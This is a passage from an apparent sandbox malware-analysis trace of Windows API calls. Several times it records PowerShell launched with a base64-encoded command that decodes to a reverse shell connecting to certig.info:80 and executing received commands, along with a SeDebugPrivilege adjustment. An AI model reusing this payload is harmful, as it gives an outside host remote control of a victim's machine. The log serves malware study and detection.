FMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQATQB5AFEASABPACwAMAAsACQATQBGAHMAcQBWACkAOwAkAGgAaQBoAG4AVAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAWgByAGsAeQBxACAAMgA+ACYAMQApACkAOwAkAHAATgBJAHUASAAuAFcAcgBpAHQAZQAoACQAaABpAGgAbgBUACwAMAAsACQAaABpAGgAbgBUAC4ATABlAG4AZwB0AGgAKQA7ACQAcABOAEkAdQBIAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABhAFcAWgBzAEMALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQBXAFoAcwBDAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==") returned 1736
	[0123.628] CoTaskMemAlloc (cb=0xd94) returned 0x1ce0a630
	[0123.628] RtlMoveMemory (in: Destination=0x1ce0a630, Source=0x1ce09892, Length=0xd92 | out: Destination=0x1ce0a630) 
	[0123.628] CoTaskMemFree (pv=0x1ce0a630) 
	[0123.629] LocalFree (hMem=0x1ce09850) returned 0x0
	[0123.787] CoTaskMemAlloc (cb=0x804) returned 0x1b89ba90
	[0123.787] GetConsoleTitleW (in: lpConsoleTitle=0x1b89ba90, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0123.787] CoTaskMemFree (pv=0x1b89ba90) 
	[0123.794] CoTaskMemAlloc (cb=0xe2e) returned 0x1ce09850
	[0123.794] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAVwBaAHMAQwA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABwAE4ASQB1AEgAPQAoACQAYQBXAFoAcwBDAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABNAHkAUQBIAE8APQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABNAEYAcwBxAFYAPQAkAHAATgBJAHUASAAuAFIAZQBhAGQAKAAkAE0AeQBRAEgATwAsADAALAAkAE0AeQBRAEgATwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFoAcgBrAHkAcQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQATQB5AFEASABPACwAMAAsACQATQBGAHMAcQBWACkAOwAkAGgAaQBoAG4AVAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAWgByAGsAeQBxACAAMgA+ACYAMQApACkAOwAkAHAATgBJAHUASAAuAFcAcgBpAHQAZQAoACQAaABpAGgAbgBUACwAMAAsACQAaABpAGgAbgBUAC4ATABlAG4AZwB0AGgAKQA7ACQAcABOAEkAdQBIAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABhAFcAWgBzAEMALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQBXAFoAcwBDAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7edc90*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x300c2c0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAVwBaAHMAQwA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABwAE4ASQB1AEgAPQAoACQAYQBXAFoAcwBDAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABNAHkAUQBIAE8APQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABNAEYAcwBxAFYAPQAkAHAATgBJAHUASAAuAFIAZQBhAGQAKAAkAE0AeQBRAEgATwAsADAALAAkAE0AeQBRAEgATwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFoAcgBrAHkAcQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQATQB5AFEASABPACwAMAAsACQATQBGAHMAcQBWACkAOwAkAGgAaQBoAG4AVAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAWgByAGsAeQBxACAAMgA+ACYAMQApACkAOwAkAHAATgBJAHUASAAuAFcAcgBpAHQAZQAoACQAaABpAGgAbgBUACwAMAAsACQAaABpAGgAbgBUAC4ATABlAG4AZwB0AGgAKQA7ACQAcABOAEkAdQBIAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABhAFcAWgBzAEMALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQBXAFoAcwBDAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessInformation=0x300c2c0*(hProcess=0x6c4, hThread=0x6c0, dwProcessId=0x708, dwThreadId=0x6a8)) returned 1
	[0123.798] CoTaskMemFree (pv=0x1ce09850) 
	[0123.799] CloseHandle (hObject=0x6c0) returned 1
	[0123.799] CoTaskMemAlloc (cb=0x3b) returned 0x1cdf4360
	[0123.799] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7edd38, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7edd38) returned 0x4550
	[0123.799] CoTaskMemFree (pv=0x1cdf4360) 
	[0123.801] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.801] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.801] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ede18, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ede18*=0x6c0) returned 1

Thread:
	id = 136
	os_tid = 0x124


Thread:
	id = 138
	os_tid = 0xa98

	[0118.937] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0118.942] ResetEvent (hEvent=0x360) returned 1
	[0229.933] QueryContextAttributesW (in: phContext=0x1cabe5b0, ulAttribute=0x1a, pBuffer=0x1cabe730 | out: pBuffer=0x1cabe730) returned 0x0
	[0230.432] DeleteSecurityContext (phContext=0x1cabdd80) returned 0x0
	[0230.434] shutdown (s=0x4cc, how=2) returned 0
	[0230.435] setsockopt (s=0x4cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0230.435] closesocket (s=0x4cc) returned 0
	[0262.834] CoUninitialize () 

Thread:
	id = 143
	os_tid = 0x858


Process:
	id = "10"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x368e7000"
	os_pid = "0x120"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "5"
	os_parent_pid = "0x8c4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAQQBmAFgASQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqAFIAWQBuAFAAPQAoACQAcwBBAGYAWABJAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABHAFYAeABKAGQAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABrAEIAZgBOAGkAPQAkAGoAUgBZAG4AUAAuAFIAZQBhAGQAKAAkAEcAVgB4AEoAZAAsADAALAAkAEcAVgB4AEoAZAAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFQARQBYAHUAeAA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARwBWAHgASgBkACwAMAAsACQAawBCAGYATgBpACkAOwAkAEEARwBqAFQAbwA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAVABFAFgAdQB4ACAAMgA+ACYAMQApACkAOwAkAGoAUgBZAG4AUAAuAFcAcgBpAHQAZQAoACQAQQBHAGoAVABvACwAMAAsACQAQQBHAGoAVABvAC4ATABlAG4AZwB0AGgAKQA7ACQAagBSAFkAbgBQAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABzAEEAZgBYAEkALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwBBAGYAWABJAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 145
	os_tid = 0xa3c

	[0127.644] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0128.524] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0128.525] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0128.525] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0128.525] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0130.512] GetVersionExW (in: lpVersionInformation=0x1cdb80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdb80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0130.514] GetVersionExW (in: lpVersionInformation=0x1cdb80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdb80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0130.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.639] GetVersionExW (in: lpVersionInformation=0x1cd8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cd8f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0130.640] SetErrorMode (uMode=0x1) returned 0x1
	[0130.642] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cda50 | out: lpFileInformation=0x1cda50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0130.643] SetErrorMode (uMode=0x1) returned 0x1
	[0130.648] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdcc0 | out: lpdwHandle=0x1cdcc0) returned 0x94c
	[0130.652] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be7d40 | out: lpData=0x2be7d40) returned 1
	[0130.655] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2be7ddc, puLen=0x1cdc30) returned 1
	[0130.659] lstrlenW (lpString="䅁") returned 1
	[0130.672] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be7eb8, puLen=0x1cdba0) returned 1
	[0130.673] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0130.676] CoTaskMemAlloc (cb=0x2e) returned 0x2d7a50
	[0130.676] lstrcpyW (in: lpString1=0x2d7a50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0130.677] CoTaskMemFree (pv=0x2d7a50) 
	[0130.677] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be7f0c, puLen=0x1cdba0) returned 1
	[0130.677] lstrlenW (lpString="System.Management.Automation") returned 28
	[0130.677] CoTaskMemAlloc (cb=0x3c) returned 0x2db870
	[0130.678] lstrcpyW (in: lpString1=0x2db870, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0130.678] CoTaskMemFree (pv=0x2db870) 
	[0130.678] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be7f68, puLen=0x1cdba0) returned 1
	[0130.678] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0130.678] CoTaskMemAlloc (cb=0x20) returned 0x2d5a00
	[0130.678] lstrcpyW (in: lpString1=0x2d5a00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0130.678] CoTaskMemFree (pv=0x2d5a00) 
	[0130.678] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be7fa8, puLen=0x1cdba0) returned 1
	[0130.678] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0130.678] CoTaskMemAlloc (cb=0x44) returned 0x2db870
	[0130.678] lstrcpyW (in: lpString1=0x2db870, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0130.678] CoTaskMemFree (pv=0x2db870) 
	[0130.678] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be8010, puLen=0x1cdba0) returned 1
	[0130.678] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0130.678] CoTaskMemAlloc (cb=0x76) returned 0x27c080
	[0130.678] lstrcpyW (in: lpString1=0x27c080, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0130.678] CoTaskMemFree (pv=0x27c080) 
	[0130.678] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be80ac, puLen=0x1cdba0) returned 1
	[0130.678] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0130.678] CoTaskMemAlloc (cb=0x44) returned 0x2db870
	[0130.678] lstrcpyW (in: lpString1=0x2db870, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0130.678] CoTaskMemFree (pv=0x2db870) 
	[0130.678] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be8110, puLen=0x1cdba0) returned 1
	[0130.678] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0130.679] CoTaskMemAlloc (cb=0x58) returned 0x296be0
	[0130.679] lstrcpyW (in: lpString1=0x296be0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0130.679] CoTaskMemFree (pv=0x296be0) 
	[0130.679] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be818c, puLen=0x1cdba0) returned 1
	[0130.679] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0130.679] CoTaskMemAlloc (cb=0x20) returned 0x2d5a00
	[0130.679] lstrcpyW (in: lpString1=0x2d5a00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0130.679] CoTaskMemFree (pv=0x2d5a00) 
	[0130.679] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x2be7e34, puLen=0x1cdba0) returned 1
	[0130.679] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0130.679] CoTaskMemAlloc (cb=0x66) returned 0x25f400
	[0130.679] lstrcpyW (in: lpString1=0x25f400, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0130.679] CoTaskMemFree (pv=0x25f400) 
	[0130.679] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x0, puLen=0x1cdba0) returned 0
	[0130.679] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x0, puLen=0x1cdba0) returned 0
	[0130.679] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdba8, puLen=0x1cdba0 | out: lplpBuffer=0x1cdba8*=0x0, puLen=0x1cdba0) returned 0
	[0130.679] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdb78, puLen=0x1cdb70 | out: lplpBuffer=0x1cdb78*=0x2be7ddc, puLen=0x1cdb70) returned 1
	[0130.681] CoTaskMemAlloc (cb=0x204) returned 0x2869b0
	[0130.681] VerLanguageNameW (in: wLang=0x0, szLang=0x2869b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0130.792] CoTaskMemFree (pv=0x2869b0) 
	[0130.793] VerQueryValueW (in: pBlock=0x2be7d40, lpSubBlock="\\", lplpBuffer=0x1cdbc8, puLen=0x1cdbc0 | out: lplpBuffer=0x1cdbc8*=0x2be7d68, puLen=0x1cdbc0) returned 1
	[0130.801] GetCurrentProcessId () returned 0x120
	[0130.814] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ccaf0 | out: lpLuid=0x1ccaf0*(LowPart=0x14, HighPart=0)) returned 1
	[0130.818] GetCurrentProcess () returned 0xffffffffffffffff
	[0130.819] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ccb10 | out: TokenHandle=0x1ccb10*=0x300) returned 1
	[0130.820] AdjustTokenPrivileges (in: TokenHandle=0x300, DisableAllPrivileges=0, NewState=0x2beb5b8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0130.822] CloseHandle (hObject=0x300) returned 1
	[0130.827] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x120) returned 0x300
	[0130.933] EnumProcessModules (in: hProcess=0x300, lphModule=0x2beb620, cb=0x200, lpcbNeeded=0x1cdb28 | out: lphModule=0x2beb620, lpcbNeeded=0x1cdb28) returned 1
	[0130.935] GetModuleInformation (in: hProcess=0x300, hModule=0x13f600000, lpmodinfo=0x2beb890, cb=0x18 | out: lpmodinfo=0x2beb890*(lpBaseOfDll=0x13f600000, SizeOfImage=0x77000, EntryPoint=0x13f60c63c)) returned 1
	[0130.937] CoTaskMemAlloc (cb=0x804) returned 0x2e3190
	[0130.937] GetModuleBaseNameW (in: hProcess=0x300, hModule=0x13f600000, lpBaseName=0x2e3190, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0130.937] CoTaskMemFree (pv=0x2e3190) 
	[0130.938] CoTaskMemAlloc (cb=0x804) returned 0x2e3190
